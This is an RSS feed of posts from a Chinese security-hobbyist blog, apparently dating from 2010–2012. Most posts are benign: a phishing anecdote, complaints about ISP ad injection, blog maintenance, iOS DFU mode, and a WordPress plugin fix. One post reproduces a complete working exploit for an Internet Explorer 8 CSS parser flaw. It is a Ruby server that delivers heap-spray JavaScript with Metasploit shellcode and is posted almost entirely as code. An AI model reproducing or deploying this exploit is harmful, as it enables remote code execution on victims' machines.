火星信息安全研究院经验总结『Skills Summary』 http://www.h4ck.org.cn Hack-Crack 信息安全 【Institute Of Information Serurity From Mars】 Sat, 04 Feb 2012 13:59:16 +0000 en hourly 1 http://wordpress.org/?v= 钓鱼啦,钓鱼啦! http://www.h4ck.org.cn/2012/01/phishing/ http://www.h4ck.org.cn/2012/01/phishing/#comments Wed, 18 Jan 2012 06:14:12 +0000 obaby http://www.h4ck.org.cn/?p=3676

今天从QQ群收到一封邮件说要我们给什么东东投票。既然是师兄发的那就瞅瞅吧。

内容是下面的样子滴:

链接显示的是什么人人(http://share.renren.com/share/438399246/11130620039),看起来还是比较安全的。但是点击了之后却跳到了QQ空间,还是个乱七八糟的什么域名。

话说TX还出过这种域名,真不专业啊,不专业。当俺是傻子啊。随便乱输就会提示错误。这个钓鱼一般都这么做,俺也这么做过。因为要跳转到常规的登录页面。所以趁着错误提示赶紧记录帐户和密码。

再次登陆一下呢,就蹦到下面去了。

因为这个错误提示就出一次,懒得清空cookie了,所以那个错误提示使用chrome截图的。这个还不是最终页面,过了上面的tx的空间载入动画就到了最终的目的地了。就是第一张图,性感吧?哈哈。

所以说:上网也小心,谨防意外生 :) !(尤其是快过年了撒!) 

相关文章

]]> http://www.h4ck.org.cn/2012/01/phishing/feed/ 0 劫持你妈啊,劫持,你妈逼的中国电信 http://www.h4ck.org.cn/2011/11/fuck-china-telcom/ http://www.h4ck.org.cn/2011/11/fuck-china-telcom/#comments Sun, 13 Nov 2011 08:19:15 +0000 obaby http://www.h4ck.org.cn/?p=3353

昨天下午的时候忽然发现在访问blog的时候竟然在状态栏出现了链接cnzz、51la以及淘宝的链接提示,话说自己现在已经不用国内的统计了,怎么tmb的还有链接提示,更不用说淘宝的广告了。而观察了一下页面发现右边出现了这么一个2b东西,114,并且页面做的和我原来的那个窗口大小整合式,不知道的可能还以为我是的内嵌广告呢!

这一招够狠啊,能和我的边栏小工具做的一样,真牛b。然而更牛逼的还不是这里,等我想要看下那个牛b的网页的加载地址的和嵌入网页代码的时候刷新了一下竟然发现没了,我操。你妈逼的果然是老流氓啊,干了就跑,跑的比兔子还快。今天下午又看到那个2b东西了,但是发现位置又到了这个空间的上面的一个小工具里。

大体看了一下那个鸟东西替换的都是Google friend connect服务的小工具,但是在我今天下午想去找到那个鸟代码的时候发现tmb的又找不到了。日,电信你真tmb的贱啊,然而这还不是最关键的是,关键是使用台湾的vpn的sock5代理依旧能出现这个2b广告,而不是用代理在国内无法访问的时候那个gfc直接显示连接被重置,却没有弹出广告。这个神出鬼没的2b广告也不是到用的是什么算法,并且这个广告看来针对的都是需要翻墙的用户。电信真tmbd贱啊。

下午刷了一会儿没结果,于是去睡了一觉,睡醒了,又刷了一次那个2b广告又出来了,操,简直是打不死的蟑螂啊。

不过用firebug还是找到了这个2b东西的代码,结果拷出来一看mlgb的竟然有将近700行,我整个页面加载下来也没几个700行啊,你妈逼的一个流氓窗口就加载了700行代码,还加了好几个站点的统计。统计你妈逼啊统计!

点进去是个什么114so的屌网站:

用bing的搜索自己加了个皮就成了114搜,这也够恶心人的,有技术的人不去研究技术研究流氓窗口dns劫持,蹦出来恶心人。自然这也是天朝特色。

电信为了这个鸟东西应该是下了功夫的,为了达到掩人耳目的效果,从出现广告页的地方直接点击查看网页,对应的窗口显示的还是原来的代码。

这一招狠啊,没有三两三还真的就让这个2b广告给唬住了,以为显示的还是原来的gfc的窗口。而这个窗口里面实际的代码则是下面的样子:

不过刚才提到所谓的dns劫持和搜索劫持忽然让我想明白了一件事情。这个东西其实并不是特地为了我的那个小窗口设计的而是在访问的过程中由于gfw的阻拦导致gfc访问失败,而那个流氓电信又劫持了搜索引擎,自动搜索了一些2b玩意儿显示到了窗口。由于那个窗口禁用了滚动条,所以显示的就只有上面的一些东西,直接在那个114中搜索一下拉动了一下窗口发现完全就是那个东西

现在这个东西的效果就和右侧的东西看起来一样了,唯一的差别是ff西面还有个滚动条,所以显示起来还是有区别的。

相关文章

]]> http://www.h4ck.org.cn/2011/11/fuck-china-telcom/feed/ 2 博客的再次改变 http://www.h4ck.org.cn/2011/11/blog-improvement-2/ http://www.h4ck.org.cn/2011/11/blog-improvement-2/#comments Sat, 12 Nov 2011 08:05:52 +0000 obaby http://www.h4ck.org.cn/?p=3313

上面的这个图是现在使用的统计代码的后台,(如果没猜错的话,刚才那个夭折的文章的第一句就是前面的这一句。但是我想不明白啊,怎么莫名其妙的要自己关机呢,话说关机就关机嘛,怎么wp也没有自动保存草稿呢。取消关机之后打开浏览器发现文章没了啊,没了……),之所以换这么一个后台主要的原因还是因为现在自己用的那个纳斯博客的统计显示了太多的错误数据,统计的地理位置明显是错误的。

在统计后台看到了好多来自美国的访问,但是实际上在Google的后台并没有那么多的来自美国的访问量。上面是提到的更换统计代码的第一个原因。第二个原因是虽然加了Google分析的统计代码,但是由于众所周知的原因Google的服务具有非常大的不稳定性,要看个统计还要经常的翻墙。
所谓的第三个原因则是现在虽然国内有众多的统计服务,但是统计的后台看起来也没有什么大的特色,并且博客的服务器在北美,而为了统计一个访问量要先到国内获取个访问统计数据,然后在返回到北美显示出来,这个东西现在看起来非常蛋疼,而相对于在美国本土的各种服务速度则要快得多。
在换了新的统计代码之后顺便把小插件右侧那个统计代码和总访问量的统计换了一下显示方式,放到了一起,就是现在的那个饼状的东东。

现在上面显示的总访问量还是从以前的访问数据添加上去直接显示的,histats的这一功能还是不错的,换了统计服务之后可以设置统计的起始总页面访问量和人数访问量。这样就不用担心新的统计数据无法在原有的基础之上进行累加。
话说最近Google pr更新了,于是查询了一下现在两个域名都已经更新到3了,而以前的那个ws的域名pr则是0,这个域名的pr上升的还是挺快的。


今天还在小白那里发现了一个更好玩的东东,她把Google +1的按钮放到了文章标题的右侧,这个做法不过是看起来还是在实际的阅读过程中感觉都是很不错的。


另外还在她那里发现了一个图标比较大的分享按钮工具栏:


不过在opera下显示的却是有些问题,有好多的图标显示不出来,需要把鼠标放上去才能看到具体的图标是个什么东东,话说俺又被抛弃啦。

这种按钮比我现在用的那种需要把鼠标放上去才能显示的分享按钮要直观一些,不过现在我的那种代码还能用。所以目前还没有换掉的打算嘎嘎。

 

另外为了不让那些牛b的黑客再次把我的blog数据全部删掉,现在已经开始往ftp服务器上备份了。嘎嘎。

相关文章

]]> http://www.h4ck.org.cn/2011/11/blog-improvement-2/feed/ 2 WRK 1.2 Souce Code http://www.h4ck.org.cn/2011/11/wrk-1-2-souce-code/ http://www.h4ck.org.cn/2011/11/wrk-1-2-souce-code/#comments Wed, 09 Nov 2011 14:07:41 +0000 obaby http://www.h4ck.org.cn/?p=3304

Click here to download the source code!

相关文章

]]> http://www.h4ck.org.cn/2011/11/wrk-1-2-souce-code/feed/ 3 博客的一些改变 http://www.h4ck.org.cn/2011/11/%e5%8d%9a%e5%ae%a2%e7%9a%84%e4%b8%80%e4%ba%9b%e6%94%b9%e5%8f%98/ http://www.h4ck.org.cn/2011/11/%e5%8d%9a%e5%ae%a2%e7%9a%84%e4%b8%80%e4%ba%9b%e6%94%b9%e5%8f%98/#comments Fri, 04 Nov 2011 17:29:35 +0000 obaby http://h4ck.org.cn/?p=3271 前几天博客被黑了,很多的事情也在另外一篇文章中提到了,丢失了一些东西。其实对于这种喜欢炫耀技术和没有什么职业道德的黑客一向没有什么好感。本人在注入之类的网站入侵技术上没什么见解,更不会什么高深的技术。所以也就只有任人宰割的地方,人为刀俎,我为鱼肉。

今天晚上重新处理了一下blog上的一些东西,去掉了所有的广告,现在加载速度也有了一定的提升,其实提供了一年的广告不过挣了少的可怜的一点钱。

做了这么久,就这么点钱,也没想过要拿到手,于是就直接改了一下。直接做了公益。

自此之后也不准备再投放任何的广告了,由于博客的受众比较小。因为投放的广告也没有什么太多的意义。去掉广告提升一些加载速度吧。

另外升级了一下插件,去掉了所有没有启用的插件。最后在添加博客版权的地方出现了一个东西,其实是一个链接。这里把协助推广给去掉了,但是感谢 Easwy Yang提供的优秀插件,该地址已经添加到链接表中。就现在的状况看来,博客会保持这个状态一阵子。尽量还是走简洁的路线,不去搞一些花花绿绿的东西,记录一些有用的东西。

如果那天哪个伟大的niub黑客又黑掉了我的网站,请保持本站数据的完整性,谢谢!

相关文章

]]> http://www.h4ck.org.cn/2011/11/%e5%8d%9a%e5%ae%a2%e7%9a%84%e4%b8%80%e4%ba%9b%e6%94%b9%e5%8f%98/feed/ 2 iOS设备 恢复模式和DFU模式的区别【翻译】 http://www.h4ck.org.cn/2011/09/recovery-mode-and-dfu-mode/ http://www.h4ck.org.cn/2011/09/recovery-mode-and-dfu-mode/#comments Thu, 22 Sep 2011 03:28:32 +0000 obaby http://www.h4ck.org.cn/?p=3160 恢复模式和DFU模式最大的不同在于是否启动了iBoot。在恢复模式下系统使用iBoot来进行固件的回复和升级,而在DFU模式下系统则不会启动iBoot,因而你可以在DFU模式下进行固件的降级。iBoot是iOS设备上的启动加载器,当你在回复模式下进行系统恢复或者升级的时候,iBoot会检测你要升级的固件版本,以确保你要升级的固件版本比当前系统的固件版本要新(版本号更高)。如果要升级的固件版本比系统当前安装的固件版本要低的话,iBoot将会禁止附件的恢复。因为这个原因所以要进行固件的降级则必须要将设备切换到DFU模式下。这也就意味着如果你需要恢复当前的固件版本,只需要将设备切换到恢复模式即可,iTunes会接管接下来的恢复工作;如果你需要将固件进行降级,你需要进入到DFU模式下。比如,在没有进入DFU模式的情况下,你不能将你的固件从3.0降级到2.2.1.

恢复模式:恢复模式是设备在常规的恢复或者升级的时候正常启动iBoot下的一种状态。由于在恢复模式下iBoot是正常启动的,因而它不允许你降级你设备上的固件。并且,除非iBoot被破解,否则它不允许安装自定义的固件。

DFU模式:这是一种依旧可以和iTunes正常连接的一种特殊模式,在这种模式下系统将不会启动iBoot进程。在DFU模式下,设备将会显示一个完全的黑屏。所以在这种模式下你没有办法通过观察设备屏幕来判断是否已经进入DFU模式还是系统当前处于关机状态。在这种状态下我们可以使用专门的工具(Pwnage tool.)来进行固件的降级或者安装用户自己制作的固件。

进入恢复模式:

  1. 彻底关闭设备,并且将设备与PC断开连接;
  2. 按住Home键;
  3. 在长按Home键的同时将设备连接到计算机;
  4. 一直按住Home键,直到你在设备屏幕上看到“连接到iTunes”的图片时你就进入到恢复模式了

退出恢复模式:安装电源键10秒即可。

进入DFU模式:

  1. 把设备连接到PC;
  2. 关闭设备;
  3. 同时按住Home键和电源键十秒(要精确计时哦)
  4. 松开电源键,继续按住Home键,直到在电脑上看到识别到DFU状态下的USB设备时就进入到DFU模式了;
  5. 在经过数秒之后iTunes就可以检测并识别到处于DFU模式下的设备了;
  6. 如果在设备上出现恢复图标那么你是处于恢复模式下,而不是DFU模式。

退出DFU模式:按住Home键和电源键10秒,设备关机之后重新启动设备即可。

原文链接:http://www.ihackintosh.com/2009/06/recovery-mode-and-dfu-mode/

 

 

相关文章

]]> http://www.h4ck.org.cn/2011/09/recovery-mode-and-dfu-mode/feed/ 0 关于搜索引擎 Google/百毒 http://www.h4ck.org.cn/2011/03/google-and-baidu/ http://www.h4ck.org.cn/2011/03/google-and-baidu/#comments Wed, 30 Mar 2011 05:25:21 +0000 obaby http://www.h4ck.org.cn/?p=2623

偶然看了一下博客访问量的统计数据,发现从百毒已经基本没有流量过来了。而绝大多数的流量来自Google。PV和IP基本是一个统一的关系,通过上面的图可以看到以前大约是在月初的时候百毒还是能带来几个IP的,但是到了五号就没有任何的流量了基本。话说博客本身没有多少访问量,但是百毒这点数据也这狗丢人的。

然后查看了一下博客的收录结果数,就是下面的两幅图片的样子:

上图是Google的搜索结果,大约有1890项,点击后面的链接查看结果:http://www.google.com/search?hl=en&source=hp&q=site%3Ah4ck.org.cn&aq=f&aqi=&aql=&oq=

而现在看看百毒的结果:

只有28个结果,哈哈。真是神奇的搜索引擎啊!如果不相信可以点击后的链接测试:http://www.baidu.com/s?wd=site%3Ah4ck.org.cn 如果你有自己的网站也可以看下自己的网站在不同的搜索引擎的收录数量。这就是号称全球最大的中文搜索引擎,真tmb的恶心。

既然只有28项,那么统计数据成了下面的样子也就在情理之中了:

所以搜索引擎变成这个结果也就是情理之中的。本人比较强穷,既然百毒屏蔽了本站,那么就屏蔽下去吧。

建议:

使用Google进行搜索,如果Google被重置可以使用Bing,不要整天什么“百毒一下,你就知道”,百毒一下你什么都不知道,还有可能被骗!

相关文章

]]> http://www.h4ck.org.cn/2011/03/google-and-baidu/feed/ 2 博客被卡巴斯基上网控制屏蔽 http://www.h4ck.org.cn/2011/01/blog-blocked-by-kis/ http://www.h4ck.org.cn/2011/01/blog-blocked-by-kis/#comments Sun, 16 Jan 2011 12:00:19 +0000 obaby http://h4ck.ws/?p=2405 今天晚上到家之后发现能上网了,好久没有升级的卡巴斯基也毫不犹豫的自己升级了上去。结果升级完之后发现博客打不开了,提示信息如下:



并且访问另外的一个域名效果是同样的,也弹出了阻拦信息:

个人认为并屏蔽的原因是由于破解软件较多,造成了这种状况。如果信任本章请将其加入排除列表,点击提示页面的“如果您认为网页错误的被阻止了,请点击此处”会弹出一个添加排除对话框,将其添加到排除列表就可以了,或者直接关闭上网控制功能,如果不信任本站请直接离开,谢谢。

今天睡觉睡的有点少,昨天晚上跑到世纪园的五楼打台球,话说很郁闷,那个球杆没有杆头,话说没有杆头也就罢了,太子竟然不是平的,有个台阶。于是每次都会看到那个球在桌子上跳来跳去,甚至直接飞了出去了。天哪。太神奇啦。

今天晚上看看能看完那几页代码不,如果看不完也早点休息。要不明天就起不来了。早睡早起,嘎嘎。 :)

随机文章

]]> http://www.h4ck.org.cn/2011/01/blog-blocked-by-kis/feed/ 4 Internet Explorer 8 CSS Parser Exploit Code http://www.h4ck.org.cn/2010/12/internet-explorer-8-css-parser-exploit-code/ http://www.h4ck.org.cn/2010/12/internet-explorer-8-css-parser-exploit-code/#comments Sat, 25 Dec 2010 03:23:11 +0000 obaby http://www.h4ck.org.cn/?p=2326 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

#!/usr/bin/env ruby 
 
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
 
require 'socket'
 
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
 
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
 
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
 
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
 
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res < < "\x00#{b.chr}"
    end
    res 
end

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109

@css_name = "\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s"
@html_name = "test.html"
placeholder = "a" * (@css_name.length/2) 
 
@html = < <-HTML
    <script> 
    function dup_str(str, length) { 
        var res = str; 
        while(res.length < length) { 
            res += res; 
        } 
        res = res.substr(res.length - length); 
        return res; 
    } 
 
    function to_bin(str) { 
        var res = ""; 
        while(str.length > 0) { 
            var first = str.substr(0, 2); 
            var second = str.substr(2, 2); 
            res += "%u" + second + first; 
            str = (str.length > 4) ? str.substr(4) : ""; 
        } 
        return unescape(res); 
    } 
 
    // first heap spray 
    var base = dup_str(to_bin("0c0c0c0900000008000000730073030100000000010000730073030c"), 512+6); 
    var arr = [] 
    for(var i = 0; i < 60000; i++) { 
        arr[i] = ["" + base].join(""); 
    } 
 
    // second heap spray w/ shellcode 
    var nops = dup_str(to_bin("0c0c0c0c"), 4096+6); 
 
    // windows/exec - 200 bytes 
    // http://www.metasploit.com 
    // EXITFUNC=process, CMD=calc.exe 
    var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30" +  
                             "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031" +  
                             "%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752" +  
                             "%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a" +  
                             "%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34" +  
                             "%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475" +  
                             "%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +  
                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424" +  
                             "%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86" +  
                             "%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff" +  
                             "%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c" +  
                             "%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5" +  
                             "%u6c61%u2e63%u7865%u0065"); 
    var arr2 = []; 
    for(var i = 0; i < 30000; i++) { 
        arr2[i] = [nops + shellcode].join(""); 
    } 
 
    // write the link to the stylesheet 
    var link = document.createElement("link"); 
    link.setAttribute("rel", "Stylesheet"); 
    link.setAttribute("type", "text/css"); 
    link.setAttribute("href", "#{placeholder}") 
    document.getElementsByTagName("head")[0].appendChild(link); 
    </script> 
HTML
@html = "\xfe\xff" + to_uni(@html) 
@html.gsub!(to_uni(placeholder), @css_name) 
 
@css = < <-CSS
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
CSS
@css = "\xfe\xff" + to_uni(@css) 
@css.gsub!(to_uni(placeholder), @css_name) 
 
@index = <<-INDEX
<a href="#{@html_name}">#{@html_name} 
INDEX
 
TCPServer.open(55555) do |srv| 
    while true
        cli = srv.accept 
        req = ""
        html = ""
        css = ""
        index = ""
        next unless sock_read(cli, req, 5) 
        while req.length > 0
            if req =~ /GET/ 
                if req =~ /GET.*#{Regexp.escape(@html_name)}/ 
                    break unless http_send(cli, @html, :type=>"text/html") 
                elsif req =~ /GET.*index/ 
                    break unless http_send(cli, @index) 
                elsif req =~ /GET.*#{Regexp.escape(@css_name)}/ 
                    break unless http_send(cli, @css, :type=>"text/css") 
                else
                    break unless http_send(cli, @css, :type=>"text/css") 
                end
            elsif req =~ /QUIT/ 
                exit() 
            end
            req = ""
            next unless sock_read(cli, req, 5) 
        end
        cli.close rescue next
    end
end

Link:http://www.exploit-db.com/exploits/15746/

相关文章

  • 没有找到.
]]> http://www.h4ck.org.cn/2010/12/internet-explorer-8-css-parser-exploit-code/feed/ 0 Ticket #11289, IE bug fix Error http://www.h4ck.org.cn/2010/12/ticket-11289-ie-bug-fix-error/ http://www.h4ck.org.cn/2010/12/ticket-11289-ie-bug-fix-error/#comments Fri, 17 Dec 2010 03:42:37 +0000 obaby http://www.h4ck.ws/?p=2259 ]]> In the past 3 days ,every day there were almost 100 spam comments. The Askmit recognized these spams ,but i have to delete these spams myself .I dislike to do this ,so i reactived the Math comment spam protection plugin.However the plugin dosen’t work very well, if u post a comment with the answer blank or wrong ,it will just show u the fallow error message like this:

1
2
3
4
5
6
7
8
9
10

<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress ? Error</title>
<link rel="stylesheet" href="http://www.h4ck.ws/wp-admin/css/install.css" type="text/css" />
</head>
<body id="error-page">
<p>ERROR: Somethin here.</p></body>
</html>


The error message can be located in the wp-includes/functions.php file at the line 2740:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono -->
<html xmlns="http://www.w3.org/1999/xhtml" <?php if ( function_exists( 'language_attributes' ) ) language_attributes(); ?>>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>< ?php echo $title ?></title>
	<link rel="stylesheet" href="<?php echo $admin_dir; ?>css/install.css" type="text/css" />
< ?php
if ( 'rtl' == $text_direction ) : ?>
	</link><link rel="stylesheet" href="<?php echo $admin_dir; ?>css/install-rtl.css" type="text/css" />
< ?php endif; ?>
</link></head>
<body id="error-page">
< ?php endif; ?>
	< ?php echo $message; ?>
</body>
</html>

But the error was caused by the wp_die() function in the file plugins/math-comment-spam-protection/math-comment-spam-protection.php at the line 217:

1
2
3
4
5
6
7
8

switch ($result) {
  case 'No answer': 
      wp_die( apply_filters('pre_comment_content', stripslashes($this->g_opt['mcsp_opt_msg_wrong_answer'])) );
      break;
 case 'Wrong answer': 
     wp_die( apply_filters('pre_comment_content', stripslashes($this->g_opt['mcsp_opt_msg_wrong_answer'])) );
     break;
}

The error message was posted by the wp_die() function,vie google i found that the wp_die() funciton is just do the same thing as die() fuction.So i replaced the wp_die() with die(),then the error message disappered.lol.

1
2
3
4
5
6
7
8
9
10

switch ($result) {
  case 'No answer': 
     echo "<script language='JavaScript'>window.alert('错误:请在评论框下方的区域中输入右侧数学运算的运算结果!');</script>";
     die();
     break;
 case 'Wrong answer': 
    echo "<script language='JavaScript'>window.alert('错误:结果错误,请重新进行运算后输入正确的结果!');</script>";	
    die();
    break;
}

相关文章

]]> http://www.h4ck.org.cn/2010/12/ticket-11289-ie-bug-fix-error/feed/ 0